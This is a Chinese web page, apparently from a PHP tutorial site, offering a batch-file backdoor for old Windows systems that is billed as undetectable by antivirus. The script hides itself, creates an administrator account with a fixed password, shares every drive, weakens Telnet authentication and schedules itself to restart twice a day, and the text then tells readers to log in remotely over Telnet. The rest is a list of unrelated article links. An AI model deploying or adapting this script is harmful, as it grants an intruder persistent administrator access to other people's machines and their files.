用批处理写的后门 永不被杀


代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm

@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit

这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
运行后TELNET IP上去,用户名为xyt,密码为hacker。



相关阅读:
不显示输入法这种故障的3种解决方法
asp.net下创建、查询、修改带名称空间的 XML 文件的例子
PHP5.2下chunk_split()函数整数溢出漏洞 分析
7.7 用ASP实现对MP3曲目信息的操作
JQuery 简便实现页面元素数据验证功能
Windows Vista制作专杀批处理文件自动杀毒
linux下的yum
PHP设计聊天室步步通
FIF互动帮助手册系列-HTML手册 flash版
如何把ASP编写成DLL
CentOS 5.4 rsync+inotify配置触发式(实时)文件远程同步
关于Linux操作系统Fdisk工具的使用介绍
初学者接触HTML了解一些HTML标记(1)
微软发布更新程序 盗版Windows7桌面将变黑
快速导航

Copyright © 2016 phpStudy |